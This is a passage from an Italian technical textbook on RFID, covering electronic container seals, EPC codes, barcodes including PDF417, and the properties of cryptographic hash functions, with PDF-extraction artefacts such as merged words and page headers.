– Il secondo tipo utilizza un solo TAG “sacrificale” per certificare l’avve-nuta apertura del sigillo, mentre il secondo TAG è permanente, deltipo scrivibile ed utilizzato per l’informazione circa la corretta chiusu-ra del sigillo. Il sistema richiede un Reader abilitato alla scrittura delTAG permanente. Il Reader stabilisce quando la chiusura è avvenutacorrettamente in conformità con parametri meccanici e scrive il TAGpermanente. Ad esempio, in Figura VIII.16, si vede un sigillo che disolito è utilizzato con una chiave dinamometrica. Il Reader stabiliscel’avvenuta chiusura quando la chiave dinamometrica indica che è stataapplicata una coppia sufficiente per chiudere il sigillo.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva398

VIII.7.5

Figura VIII.16Sigillo con due TAG a 125 kHz,

utilizzato con chiave dinamometrica

Figura VIII.17Esempio di sigillo a doppio TAG

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 398

Page 384: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Nella Figura VIII.17 è presentato un altro modello di sigillo a doppioTAG a 125 kHz, progettato dal SILab.

SIGILLO MULTI-TAGI sigilli a tre o più TAG hanno tutte le funzionalità descritte fino a questomomento, in aggiunta alla possibilità di salvare al proprio interno nume-rose informazioni riguardanti la vita del sigillo stesso.Nel caso di sigillo a tre TAG, si tratta di due TAG passivi sacrificali (a

125 kHz) e di un TAG passivo permanente, scrivibile, dotato di memo-ria di buone dimensioni ed adatto a scritture multiple.Il TAG permanente, a differenza degli altri due, non è distrutto duran-

te la normale vita del sigillo.Un sigillo a tre TAG permette, entro certi limiti, di sapere quando è

avvenuta un’effrazione. Questo tipo di sigillo, infatti, grazie al terzo TAG,dispone di un quantitativo di memoria che può essere utilizzata per salva-re la data e l’ora dell’ultima verifica, il nome dell’operatore che l’ha effet-tuata, le coordinate GPS del luogo in cui è stata effettuata, il codice delcontainer su cui è applicato, ecc.In questo modo è possibile sapere qual è stata l’ultima ispezione in cui

il container si trovava integro, e di conseguenza individuare la persona ol’ente responsabile per il container in quel momento.Anche questo sistema richiede un Reader abilitato alla scrittura del

TAG permanente. Il Reader ha anche il compito di salvare sul TAG per-manente i dati relativi al viaggio e alle ispezioni. Il Reader eseguirà unacopia locale dei dati e trasmetterà una copia a un server remoto (ad esem-pio attraverso rete di telefonia mobile o WiFi). In questo modo gli ispetto-ri avranno un ulteriore mezzo di verifica a disposizione, ossia la possibilitàdi effettuare controlli incrociati su un sigillo anche nel caso in cui questorisulti integro, in modo da rivelare eventuali incongruenze o dati sospetti.Il SILab ha progettato diversi tipi di sigillo a tre TAG con relativi

Reader (vedi Figura VIII.18). Il Reader è costituito da un PDA con un’an-tenna progettata su misura per il sigillo, ed un software scritto dal SILabper eseguire le operazioni descritte in precedenza.

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID399

Figura VIII.18Sigillo a tre TAG e Reader

VIII.7.6

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 399

Page 385: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

7.6.1 Field test: il “Lithuanian corridor”

Il sistema sigillo/lettore a tre TAG illustrato in Figura VIII.19 è statooggetto di un test trial svolto in collaborazione con l’Agenzia delleDogane della Lituania.Le autorità doganali lituane hanno affrontato il problema del transito

di camion e container russi provenienti dalla Bielorussia e destinati aKaliningrad, enclave russa situata in territorio lituano al confine con laPolonia. Per transitare dalla Lituania a Kaliningrad i container attraver-sano il cosiddetto Lithuanian corridor.L’esigenza dell’Agenzia delle Dogane della Lituania consisteva nell’ave-

re gli strumenti per controllare i camion e container in transito sul proprioterritorio senza rallentare troppo il flusso del traffico alle due frontiere, edi procedere alla perquisizione dei mezzi solo se erano presenti segni dieffrazione.

Le autorità lituane hanno quindi chiesto alla Direzione generaleTAXUD della Commissione Europea aiuto per risolvere il problema.L’incarico è stato passato al JRC che ha progettato e costruito i sigilli a treTAG descritti in §VIII.7.6. I sigilli sono stati applicati al traffico entrantealle frontiere lituane e rimossi e ispezionati all’uscita dal Paese.Il sistema ha dato prova di buona affidabilità, dimostrando che la tec-

nologia RFID passiva risulta adatta ad applicazioni di sigillatura comequella descritta, dove le condizioni ambientali (vibrazioni, pioggia, ecc.)hanno messo a prova la sua robustezza e qualità.

SIGILLI ATTIVI

Un tipo innovativo di sigillo attivo attualmente in via di sviluppo al SILabusa una combinazione di tecnologie attive e passive. Questo sigillo contie-ne un circuito elettronico suddiviso in due moduli logici: il primo è unReader di prossimità per RFID passivi, il secondo è un TAG attivo cheviene interrogato dai reader esterni durante i controlli. Le due unità sonocoordinate da un semplice microprocessore e da una piccola memoriaEPROM.Il cavo di chiusura del sigillo contiene un TAG passivo nella sua estre-

RFID - Fondamenti di una tecnologia silenziosamente pervasiva400

VIII.7.7

Figura VIII.19Il Lithuanian corridor e l’enclave russa

in Lituania

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 400

Page 386: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

mità; alla chiusura del sigillo il Reader di prossimità legge il TAG passi-vo, il microprocessore ne controlla l’identità e le informazioni vengonoscritte sul TAG attivo. Ogni sigillo è fabbricato per poter essere chiusocon un solo cavo, e l'accoppiamento sigillo/cavo è programmato in modopermanente durante la fabbricazione del sigillo. A questo modo si è pro-tetti dalla possibilità di aprire il sigillo e richiuderlo con un cavo diversoda quello originale.I limiti principali di questo tipo di sigilli elettronici sono dati dalla

potenza in emissione permessa per i Reader che controllano i sigilli.Questo fatto limita la distanza di lettura (circa 50 m in campo aperto) epermette una verifica in transito solo a velocità moderata.Meccanicamente, il limite è dato dal determinare a priori la lunghezza

del cavo di chiusura (a sicurezza intrinseca), il che obbliga ad avere cavidi diverse misure in base al prodotto da sigillare.Infine va ricordato che le protezioni multiple sicuramente aumentano

la protezione dalla vulnerabilità elettronica, ma non ne assicurano la sicu-rezza totale.

CONCLUSIONI SUGLI eSEALI container commerciali rappresentano uno dei punti vulnerabili dellasicurezza nella catena del trasporto merci. Negli ultimi anni gli sforzi sonostati indirizzati principalmente allo sviluppo di sistemi di sigillatura piùsicuri e affidabili, un sigillo però, di qualsiasi tipo sia, non può garantirela sicurezza del sistema “trasporto”, ma la può solo aumentare. L’uso dinuove tecnologie, tra le quali un posto di primo piano spetta senza dub-bio all’RFID, è comunque sicuramente utile nel rendere più affidabili gliattuali sistemi di sigillatura.I limiti maggiori restano legati alla debolezza della supply chain che

viene considerata in ogni suo singolo componente, ma mai come un siste-ma, poco è stato fatto per avere una visione più globale del problema“sicurezza nei trasporti”.Per ottenere risultati migliori occorre ricercare una visione più organi-

ca del problema da risolvere. Occorre prevedere test di vulnerabilità su

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID401

VIII.7.8

Figura VIII.20Sigillo attivo

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 401

Page 387: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

tutto il “sistema container” e non solo su una sua parte, seppure impor-tante, come la sigillatura.Più in generale occorre analizzare l’intera supply chain, eseguendo test

di vulnerabilità che includano tutto il ciclo di movimentazione dellemerci, dalla partenza alla destinazione finale.Per parte sua, la Commissione Europea, tramite la sua Direzione

Generale TAXUD e in collaborazione con le Agenzie Doganali degli Statimembri, sta portando avanti diversi progetti pilota e gruppi di lavoro sultema della sicurezza nei trasporti.Il JRC partecipa in veste di consulente scientifico nella stesura delle

linee guida per le direttive della Commissione su questo tema, e forniscegli strumenti e le attrezzature per sperimentare sul campo l’applicabilitàdella tecnologia RFID nella sicurezza dei trasporti.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva402

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 402

Page 388: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIDFondamenti di una tecnologia silenziosamente pervasiva

PARTE IX

APPENDICI E BIBLIOGRAFIA

di Paolo Talone, Giuseppe RussoFondazione Ugo Bordoni

In questa parte sono contenute: Le citazioni bibliografiche delle pubblicazioni consultate per la stesura del

volume. Una piccola appendice dedicata alla misura della potenza emessa dai

trasmettitori RF. Una appendice sul ruolo di EPCglobal per il codice universale per

l’identificazione di oggetti. Una illustrazione (a margine dell’appendice precedente) sui codici a barre

monodimensionali (correntemente usati) e su quelle bidimensionali (di nuovagenerazione).

Viene infine illustrato un compendio degli standard EPCglobal, ISO ed ECMAattinenti gli RFID, riportandone l’elenco, i riferimenti e l’abstract originale (ininglese) ove disponibile.

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 403

Page 389: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

APPENDICE A – POTENZE DI EMISSIONE A RF: ERP VS.EIRP

Le misure di potenza, per i limiti delle emissioni irradiate da apparati aradiofrequenza (tra cui anche TAG e Reader RFID), fanno riferimento adue differenti parametri.- In Europa viene usato l’ERP (Effective Radiated Power)ERP si riferisce al prodotto tra la potenza elettrica con la quale l’anten-na viene alimentata ed il guadagno dell’antenna medesima, in una datadirezione, riferito a quello di un dipolo a mezza onda.

- Negli USA viene usato l’EIRP (Equivalent Isotropic Radiated Power).EIRP si riferisce al prodotto tra la potenza elettrica con la quale l’an-tenna viene alimentata ed il guadagno dell’antenna medesima, in unadata direzione, riferito a quello di un’antenna isotropa (un’antenna iso-tropa irradia la stessa potenza in tutte le direzioni, producendo un dia-gramma di radiazione sferico).La relazione che lega le due grandezze è EIRP = ERP*1,64Naturalmente sarebbe sensato usare sempre la medesima terminologia

tecnica, tuttavia, per varie ragioni, l’armonizzazione dei termini negli stan-dard internazionali non è sempre facile da raggiungere.

APPENDICE B – IDENTIFICATIVI DELLE MERCI: EPC VS.CODICE A BARRE

IL CODICE EPC (ELECTRONIC PRODUCT CODE)Nei sistemi RFID, un ruolo di grande importanza è giocato dalla defini-zione di un identificatore universale per gli oggetti.L’EPC– Electronic Product Code è il più celebre tra questi indicatori

e, negli ultimi anni, ha molto contribuito al decollo della tecnologia RFID,a migliorare l’efficienza della catena di distribuzione ed a ridurre i costioperativi.L’origine dell’EPC data all’ottobre 1999 quando, nel Dipartimento di

ingegneria meccanica del MIT, fu creato l’Auto-ID center.Lo scopo non era quello di rimpiazzare i codici a barre, a tutt’oggi di

PARTE IX - APPENDICI & BIBLIOGRAFIA405

IX.1

IX.2

IX.2.1

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 405

Page 390: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

uso universale, ma di creare un percorso di migrazione tra i codici mede-simi e le potenzialità dei sistemi RFID.Da tempo erano note le potenzialità della tecnologia RFID e l’obietti-

vo di Auto-ID center era quello di creare i presupposti per una diffusio-ne massiva della tecnologia. Questo venne realizzato ponendo le basi peruna riduzione dei costi sia attraverso la razionalizzazione delle molte spe-cifiche tecniche esistenti, sia definendo TAG più semplici possibili, con-cepiti per fornire ovunque, lungo la catena di distribuzione, un codiceidentificativo universale in grado di raggiungere il livello del singolooggetto.Questi paradigmi comportano che, per ottenere informazioni comple-

te e leggibili in chiaro, i codici contenuti nei TAG debbano essere utiliz-zati come puntatori alle informazioni contenute in un sistema informati-vo, con una modalità simile a quella con cui i server DNS operano inInternet (cfr.§II.9).Auto-ID center ha completato il lavoro e chiuso l’attività nell’ottobre

2003 con un meeting a Tokyo.La sua tecnologia è stata trasferita ad una joint venture tra EAN

International e Uniform Code Council (UCC), le due maggiori organizza-zioni che controllano l’assegnazione dei codici a barre. La nuova organiz-zazione è denominata EPCglobal (www.epcglobalinc.org) ed amministralo sviluppo e l’avanzamento dello standard del codice EPC.Il codice EPC è evoluto dal codice a barre EANUCC (European

Article Numbering/Universal Code Council) largamente usato per identi-ficare i prodotti, ma non i singoli oggetti; è simile al codice UPC(Universal Product Code), ovvero il noto GLOBAL Trade Item Number(GTIN) contenuto nei codici a barre stampati sulla maggior parte dei pro-dotti oggi venduti, ne include tutte le funzioni aggiungendone di nuove.Ciò che distingue principalmente l’UPC dall’EPC è che mentre il

primo contiene gli identificativi del prodotto e del produttore, quest’ulti-mo contiene anche un numero di serie dell’oggetto che consente di distin-guerlo in modo univoco lungo la catena di distribuzione.La lunghezza dell’EPC va da 64 a 256 bit divisi in 4 campi.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva406

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 406

Page 391: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Un tipico esempio può essere costituito da un EPC di tipo 1, a 96 bit,il cui layout viene ora illustrato:- Header (8 bit 0÷7)L’header è de definisce la lunghezza del codice ed il tipo di EPC. Inquesto caso 01 indica un EPC di tipo 1 a 96 bit (la lunghezza dei varitipi di EPC va da 64 a 256 bit).

- EPC manager (28 bit 8÷35)contiene tipicamente l’identificativo del fabbricante del prodotto (a cuiil TAG è attaccato)

- Object Class (24 bit 36÷59)indica il tipo di prodotto, seguendo la codifica SKU (Stock KeepingUnit)

- Serial number (36 bit 60÷96)Fornisce un identificatore univoco per il singolo prodotto di una singo-la classe e di un singolo fabbricante (con 96 bit si possono univocamen-te identificare un massimo di 68 miliardi = 296 oggetti diversi).

I CODICI A BARRE

2.2.1 Codici a barre monodimensionali

Il codice a barre classico (monodimensionale) è composto da una singolariga di barre ed i dati sono codificati in senso orizzontale. La dimensioneverticale è, come la grandezza complessiva del codice, solo una ridondan-za che assicura la lettura dei dati anche in condizioni fisiche avverse oquando l’etichetta è parzialmente rovinata. Incrementare la quantità deidati contenuti in un codice a barre monodimensionale significa pertanto

PARTE IX - APPENDICI & BIBLIOGRAFIA407

Figura IX.1Esempio di EPC di tipo 1 (96 bit) [7]

IX.2.2

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 407

Page 392: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

aumentarne la larghezza. Questo raggiunge rapidamente un limite oltre ilquale la lettura diviene difficoltosa.

Esistono vari standard di codici a barre monodimensionali, quasi sem-pre affiancati dalla scrittura “in chiaro” del codice per ottenere un’eti-chetta “human-readable”.In genere, i lettori sono predisposti per la maggior parte degli standard.La Tabella IX.1, nel paragrafo successivo, illustra, tra l’altro, alcuni

esempi di codici a barre monodimensionali.

2.2.2 Codici a barre bidimensionali

Mentre gli RFID si stanno affermando come tecnologia per l’identifica-zione degli oggetti, continua l’evoluzione dei “vecchi” codici a barre,spesso ad opera delle stesse aziende che sviluppano le tematiche RFID.La ragione di ciò è da ricercarsi in varie cause che fanno si che i codici

a barre (o meglio gli identificatori a lettura ottica) vengano ancora visticon favore. Alcuni dei fattori sono:- il procedere della ricerca scientifica e delle applicazioni tecnologicheche, comunque, operano innovazione ovunque sia possibile, anche neicodici a barre;

- il fatto che i codici a barre godono di un costo imbattibile (essendo unasemplice stampa) e siano profondamente radicati negli ambienti digestione delle merci;

- l’uso di tecnologia a radiofrequenza risulta comunque più “invasivo”rispetto ad una semplice lettura ottica, ciò può provocare qualche resi-stenza o addirittura l’interdizione della tecnologia RFID in ambientiparticolari.La maggiore evoluzione dei codici a barre consiste nell’uso di immagi-

ni bidimensionali.Un codice a barre si dice bidimensionale quando sfrutta entrambe le

dimensioni per immagazzinare i dati. Questo incrementa di molto laquantità di “memoria” portandola al livello degli RFID.L’introduzione di codici bidimensionali è possibile per l’evoluzione dei

lettori ottici, passati da tempo dagli scanner lineari e dalle “light pen”, agliscanner laser ed ai sistemi a CCD (sostanzialmente telecamere). Questi

RFID - Fondamenti di una tecnologia silenziosamente pervasiva408

Figura IX.2Un comune codice a barrre

monodimensionale (Code 39)

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 408

Page 393: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

sistemi, nati per leggere i codici a barre in modo indipendente dal loroorientamento, sono naturalmente dei lettori bidimensionali.Il più celebre tra i codici a barre bidimensionali è il PDF417, realizza-

to dalla Symbol Technologies, azienda leader sia nel ramo dei codici otti-ci sia in quello degli RFID.Come in tutti i codici bidimensionali, i dati sono codificati sia in senso

orizzontale sia verticale incrementando la loro quantità pur mantenendouna dimensione che consenta una lettura agevole.Il codice PDF417 è formato da un certo numero di righe (minimo 3,

massimo 90) ciascuna delle quali è interpretabile come un codice a barrelineare. In ciascuna riga possono essere presenti i seguenti campi:• Quiet Zone iniziale; che costituisce la minima lunghezza di spazio bian-co prima dell’inizio del codice.

• Start Pattern; che identifica il tipo di codice (PDF417) ogni tipo codi-ce a barre il proprio start e stop pattern.

• “Row Left” codeword; che contiene infomazioni sulla riga (numero diriga, l’ammontare dei dati del “codice autocorrettore” della riga, ecc.).

• Data Region; da 1 a 30 codeword (simboli di carattere).• “Row Right” codeword; contiene ulteriori informazioni sulla riga.• Stop pattern; vedi start pattern.• Quiet Zone finale; che costituisce la minima lunghezza di spazio bian-co dopo la fine del codice.

PARTE IX - APPENDICI & BIBLIOGRAFIA409

Figura IX.3Codice a barre bidimensionale (PDF417)

Figura IX.4Posizione dei campi dati nel codice PDF417

(da PDF417 Specification -http://www.morovia.com/education/

symbology/pdf417.asp)

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 409

Page 394: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Il nome PDF è l’acronimo di “Portable Data File”, e la sigla 417 indi-ca che l’unità di dati elementare del codice, detta “Codeword”, si esten-de su una riga per un totale di 17 moduli in cui sono presenti quattrobarre verticali e da quattro spazi di larghezza variabile. Il modulo è laminima larghezza ammessa per una barra verticale.Le Codeword sono un gruppo di barre e spazi (come nei codici mono-

dimensionali) che rappresentano caratteri (alfanumerici o di altro tipo).Ogni riga possiede lo stesso numero di Codeword.Ogni Codeword contine quattro barre e quattro spazi (da cui il 4 in

PDF417), inizia con una barra e termina con uno spazio.Per evitare false letture (in obliquo) quando la riga di scansione dello

scanner non è parallela alla riga del codice, esiste un meccanismo chiama-to cluster che codifica i caratteri nello stesso modo sulla riga ma cambiamodo di codifica su righe adiacenti (modulo 3 righe).La dicitura “Portable data file” indica il fatto che, più che un semplice

codice, si tratta di un (piccolo) file di dati relativo all’oggetto. Questo codi-ce, infatti, può contenere, a seconda del formato dei dati, fino a 2.710 carat-teri; questo permette di codificare all’interno del codice tutte le informazio-ni che necessitano.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva410

Figura IX.5Sistema di lettura per codici bidimensionali

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 410

Page 395: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Si ricorda che un comune codice a barre contiene una decina di caratteri,un codice EPC ne contiene da 12 in su, ed un TAG RFID può contenerediversi kByte di memoriza, ovvero, oltre al codice EPC, può memorizzarediverse migliaia di caratteri.Una caratteristica importante è la possibilità, in fase di codifica, di

riservare un’area per l'utilizzo di tecniche di auto-correzione degli even-tuali errori dovuti ad alterazioni del codice; questo rende possibile la let-tura del codice anche in caso di strappi, buchi, segni, eccetera. Un codicePDF417 può contenere al massimo 928 codewords, di cui fino 29 per funzio-ni speciali; fino a 900 per codificare caratteri e da 2 a 512 per il “recupero erro-ri”; è quindi possibile leggere correttamente un codice con un’area danneggia-ta fino a circa il 55%.

PARTE IX - APPENDICI & BIBLIOGRAFIA411

Tabella IX.1Codici a barre monodimensionali;

la stampa è realizzata in scala nella tabella econ la tabella seguente, per il confronto delledimensioni [http://www.barcodeman.com]

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 411

Page 396: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva412

Tabella IX.2Codici a barre bidimensionali;

la stampa è realizzata in scala nella tabella econ la tabella precedente per il confronto

delle dimensioni; viene evidenziato il “Tradeoff” tra le tecnologie mono e bidimensionali

(corrispondente a 10÷20 caratteri)[http://www.barcodeman.com]

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 412

Page 397: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

EPC VS. CODICI A BARRE

I codici a barre sono ad oggi di uso universale per l’identificazione auto-matica dei prodotti nella catena di distribuzione. Anche se i codici a barrehanno portato un grande incremento di efficienza, presentano ancoraqualche criticità e l’uso degli RFID con il codice EPC può costituire unasoluzione migliore e fonte di ulteriori ottimizzazioni.Il primo elemento da considerare nell’implementazione di tecnologia

RFID è come la nuova tecnologia si paragona a quella corrente dei codi-ci a barre.L'interrogazione di RFID fornisce infatti maggior accuratezza dei dati,

rispetto all'esame di un codice a barre; permette inoltre velocità moltomaggiori nel flusso dei dati, opera anche in condizioni ambientali avverseed offre un significativo risparmio di lavoro. Inoltre impedisce spedizionisbagliate durante il processo del carico, permette l’uso di procedure qualil’EDI (Electronic Data Interchange) o l’ASN (Advance Shipping Notice)e rende più veloce e preciso il trattamento di eventi inattesi.Il flusso di dati risultante dalla lettura di RFID può essere 100 volte

superiore a quello proveniente dalla lettura di codici a barre. Si può gene-rare un problema per il trattamento di una simile mole di dati, certamen-te gestibile da una buona base di dati ma che può provocare problemi alivello di sistema di controllo dei lettori periferici in presenza di una retea banda stretta.I codici a barre sono noti e le loro caratteristiche ben sfruttate.Le etichette di codice a barre sono economiche, ampiamente usate e

basate su standard “aperti”. Tuttavia presentano gli svantaggi di doveroperare in visibilità ottica (line-of-sight), di avere vincoli sulla quantitàlimitata di dati e sulla loro immodificabilità, soffrono infine dei problemicausati da una qualità di stampa o una usura dell’etichetta cartacea chepossono provocare la non leggibilità del codice.I TAG RFID non richiedono visibilità ottica, il che elimina il bisogno

di spacchettamento dei prodotti per la lettura. Hanno una distanza di let-tura più lunga, a volte permettono cambiamenti dei dati memorizzati, for-niscono più informazioni dei codici a barre circa l'articolo o il contenutodi un pacchetto e superano l’affidabilità dei codici a barre in circostanze

PARTE IX - APPENDICI & BIBLIOGRAFIA413

IX.2.3

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 413

Page 398: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

fisiche avverse. Inoltre, il volume dei dati che i TAD RFID forniscono puòcondurre ad elevati livelli di controllo e visibilità operativa nella catena didistribuzione.Tuttavia, i vantaggi degli RFID derivano interamente dall’uso di tecni-

che a radiofrequenza, il che potrebbe costituire un ostacolo in certe circo-stanze. Inoltre la tecnologia è e rimarrà più costosa di quella dei codici abarre e le sue prestazioni, indubbiamente maggiori, a volte non vengonosfruttate dalle applicazioni il che vanifica i maggiori costi.

Altri svantaggi potenziali consistono nel fatto che gli standard RFIDsono ancora in evoluzione e le limitazioni legate alla radiofrequenza, adesempio l’interferenza, possono ridurne le prestazioni. Non va infine tra-scurato che, se le applicazioni non li mettono a frutto, il volume dei datiproveniente dagli RFID rispetto ai codici a barre può trasformarsi in dif-ficoltà sulla rete e sui sistemi informativi.Per il consumatore, l’EPC di un TAG RFID può fornire più informa-

zioni rispetto ad un controllo di tutte le etichette stampate. Ad esempio:- Carne e latticini saranno tracciabili dalla storia dell'animale di originefino all'acquisto del consumatore.

- Nel controllo di oggetti che richiedono particolari condizioni ambien-tali, i TAG attivi possono automaticamente e periodicamente misura-re la temperatura dei prodotti a cui sono collegati, introducendo inedi-te misure di sicurezza nella “catena del freddo”.

- Il possesso di un oggetto può essere rapidamente dimostrato, incro-ciando L’EPC con i dati di pagamento (scontrini e simili).Per il commerciante, il TAG permette di fare, all’istante, un gran

numero di verifiche:- Articoli pagati non correttamente o rimossi dall'inventario del rivendi-tore possono essere rapidamente identificati all’atto in cui questi lasci-no i locali, attivando gli allarmi di sicurezza.

- Le caratteristiche del codice EPC consentono ai commercianti di rin-tracciare e vendere pezzi unici che gli attuali codici a barre non suppor-tano.

- Il processo di inventario è inoltre notevolmente facilitato dall’uso dilettori portatili di TAG che in pochi minuti possono attraversare un

RFID - Fondamenti di una tecnologia silenziosamente pervasiva414

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 414

Page 399: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

magazzino interrogando tutti gli oggetti contenuti negli scaffali.- È possibile ricavare i profili dei consumatori (le loro preferenze) perottimizzare i mezzi promozionali.

- Permette ricerche “non visibili” di oggetti per verifiche di furti.Forse la tecnologia RFID potrà rimpiazzare interamente quella dei

codici a barre, ma è opinione diffusa che il costo relativamente economi-co dell’implementazione anche del codice a barre su un articolo o su uncontenitore etichettato con RFID possa costituire una utile ridondanzadei dati in caso di perdita dell’RFID o di informazioni errate. Fare spazioper un codice a barre dovrebbe avere un effetto quasi insignificante sulcosto o sul progetto dell’etichetta.La combinazione di un codice a barre e di un TAG RFID sembrereb-

be quindi essere il migliore ed il più economico backup dei dati per for-nire un maggior livello di sicurezza di quello oggi ottenibile.Questo significa che fino al raggiungimento di un’ampia diffusione

della tecnologia RFID e molto probabilmente anche successivamente,molti ambienti dovranno mantenere l’identificazione doppia con codice abarre e RFID.La Tabella VIII.3 riassume le caratteristiche delle due tecnologie.In conclusione, il costo ed il valore dei TAG cominciano a rivaleggiare

con i codici a barre, specie se vengono ripartiti nell’intera catena di distri-buzione e se le applicazioni mettono a frutto i vantaggi aggiuntivi dellatecnologia RFID.Le applicazioni dei TAG si espandono velocemente e la possibilità

dell’EPC di sostituire o affiancare gran parte delle applicazioni di UPC sifa sempre più concreta, specialmente perchè parecchi attori della catenadi distribuzione ne hanno già operato l’adozione.

PARTE IX - APPENDICI & BIBLIOGRAFIA415

Figura IX.6SmartLabel UHF con codice a barremonodimensionale e codice a barrebidimensionale matriciale (UPS code)

Intermec Technologies Corp

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 415

Page 400: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva416

Tabella IX.3Confronto tra codici a barre e RFID con EPC

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 416

Page 401: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

APPENDICE C – FUNZIONI HASH CRITTOGRAFICHE

Come è stato accennato in precedenza (cfr. §VIII.5.1.1), una funzione dihash applicata ad una stringa di dati di qualsivoglia lunghezza, ne general’impronta (hash sum), costituita da un numero fisso, costante e predeter-minato di bit (20 byte nel caso di SHA-1), che rappresenta univocamen-te il documento di partenza.In questa appendice l’argomento verrà approfondito, discutendo, in

particolare il fatto che, per essere efficace ed essere usata in una firmadigitale con validità legale, è necessario che la funzione hash utilizzatagoda di alcune proprietà crittografiche.Non esistendo una definizione formale che raccolga tutte le proprietà

desiderabili di una funzione hash per scopi crittografici viene generalmen-te considerata, come prerequisito, la resistenza ai cosiddetti “preimageattack” (tentativi di ottenere la stringa di origine a partire dall’impronta).Si distinguono due caratteristiche della funzione:- non invertibile” ovvero data un’impronta non deve essere possibilericavare il documento (stringa) da cui essa deriva (detta anche resisten-za ai “First preimage attack”)

- “priva di collisioni”; ovvero non deve essere possibile trovare duedocumenti diversi che producano la medesima impronta (questo impli-ca la resistenza al cosiddetto “Second preimage attack”).Per quanto riguarda le collisioni, infatti, in linea teorica, essendo le

impronte costituite da un numero finito di bit, sono anch’esse in nume-ro finito (pari a 2x dove x è il numero di bit che compongono la funzio-ne hash), mentre le possibili stringhe usate come ingresso sono in nume-ro infinito; dunque è fisicamente impossibile “mappare” un numero infi-nito di stringhe su un numero finito di impronte (2x) senza avere associa-zioni multiple (o “collisioni”). In altri termini con una funzione hashlunga x bit è possibile discriminare solo tra 2x stringhe di ingresso.Tuttavia è possibile fare in modo che il numero di possibili impronte siaestremamente elevato, e dunque la probabilità di una collisione, voluta ocasuale, sia trascurabile.Per quanto riguarda la non invertibilità occorre che la funzione hash

generi effettivamente valori molto differenti tra loro per piccole variazio-

PARTE IX - APPENDICI & BIBLIOGRAFIA417

IX.3

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 417

Page 402: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

ni della stringa in ingresso, e soprattutto che tali valori non siano “facil-mente” riconducibili al documento di partenza.Queste proprietà vanno quindi intese in senso pratico, ovvero la fun-

zione deve essere tale che, con i reali mezzi di calcolo a disposizione, nonsia realisticamente possibile creare:- una stringa che produca un determinato hash noto a priori;- due stringhe differenti riconducibili allo stesso hash (collisione).In assenza di queste proprietà sarebbe possibile “falsificare” una strin-

ga (un documento o, nel caso in questione, il contenuto di un TAG) man-tenendone valida la firma. Quel ch’è peggio, la frode non sarebbe né rive-labile né dimostrabile.Un grande aiuto contro le falsificazioni, è dato anche dalla semantica

della stringa, che si suppone abbia un significato compiuto e comprensibi-le (nel caso in oggetto questo è vero sia per gli EPC, sia per le informazio-ni aggiuntive associate ai TAG quali date di scadenza, composizione, ecc.)La semantica della stringa sottoposta a firma digitale, vanifica infatti i

metodi di generazione delle collisioni che consentono di trovare due strin-ghe, M1 e M2, che collidono generando lo stesso hash. Questi metodiinfatti, non consentono di produrre una stringa di senso compiuto aventeun hash desiderato, che è ciò che serve per “falsificare” una firma. Al con-trario, essi permettono solo di generare simultaneamente una coppia distringhe “prive di significato semantico” (ossia costituite da sequenze cao-tiche di bit) e per di più assai simili tra loro (con soli pochi bit di differen-za situati in posizioni critiche predeterminate), le quali producono unmedesimo hash, che comunque non può essere scelto a priori.Per processare un messaggio di lunghezza arbitraria ottenendo un

impronta di lunghezza prefissata e costante, vengono usualmente impiegatimetodi basati su cifratura a blocchi (block cipher). Alcuni metodi utilizza-no una cifratura a blocchi come funzione di compressione per la funzionehash, essi sono: Davies-Meyer, Miyaguchi-Preneel, Matyas-Meyer-Oseas,MDC-2 and MDC-4. Questi metodi sono usati all’interno della cosiddettastruttura Merkle-Damgård, riportata in Figura IX.7, che è il metodo dicostruzione delle funzioni hash usato nei moderni algoritmi crittografici.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva418

